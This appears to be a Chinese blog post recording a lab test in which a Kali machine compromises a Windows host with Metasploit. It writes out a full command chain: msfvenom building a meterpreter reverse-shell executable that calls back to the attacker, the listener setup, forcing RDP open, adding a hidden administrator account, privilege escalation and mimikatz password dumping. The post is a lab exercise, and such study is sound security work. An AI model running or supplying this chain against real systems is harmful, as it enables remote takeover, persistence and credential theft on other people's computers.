MSF回弹木马windows测试

windows主机地址为192.168.104.133

kali系统中使用msfvenom命令生成windows系统的回弹木马

msfvenom -p  windows/meterpreter/reverse_tcp  LHOST=192.168.104.131  LPORT=12345  -f exe -o shellreverse.exe

使用python3 -m http.server 9999来传递文件到windows主机中 

msfconsole

使用mfs开启监听

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.104.131
set lport 12345
exploit

此时我们可以查看我们的uid

getuid

使用shell命令进行查看:
 

shell

进入shell环境进行查看:

net user

net user wym

可以查看到自己的权限还是很高的,属于Administrators组

查看端口,发现远程登录端口3389并没有打开

使用命令强行打开3389端口:

run post/windows/manage/enable_rdp

强开端口后就可以进行远程登录

可以使用管理员账号登录或新建一个用户用于登录,但是新建的用户权限较低

管理员账号需在“此电脑”的“管理”的“当地用户和用户组”中打开登录选项,并设置好密码

新建用户:

net user test test123 /add

第一个字符串为账号,第二个字符串为密码

把新用户放到管理员组中去提高权限

net localgroup administrators test /add

因为打开了3389,所以可以使用本机的远程桌面来连接

也可以找到管理员密码来进行登录

使用mimikatz工具:

load kiwi

 使用hashdump来查看hash后的密码

使用help可以查看kiwi的用处

 但是查看密码时会发现权限不够,所以可以使用msf中的getsystem来提权(使用windows中的0day来进行提权,看它是否打了补丁)

getsystem

这边没成功

如果成功了,就可以抓取新的密码了。当然因为当前进程拥有者还是自己,可能还是会失败。所以可以使用 migrate 来迁移进程,来提高权限。

如果把自己的进程迁移到administrator后还是失败。可以考虑是不是mimikatz的版本问题。从github下载新的mimikatz后(远程调控把自己的磁盘加载进去可以把文件放入)放入windows受害机中,然后解压打开它的命令行页面输入mimikatz.exe启动软件使用privilege::debug命令加载权限,再使用sekurlsa::logonpasswords看看版本够不够,有可能版本不够低,需要更换更老的版本

  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值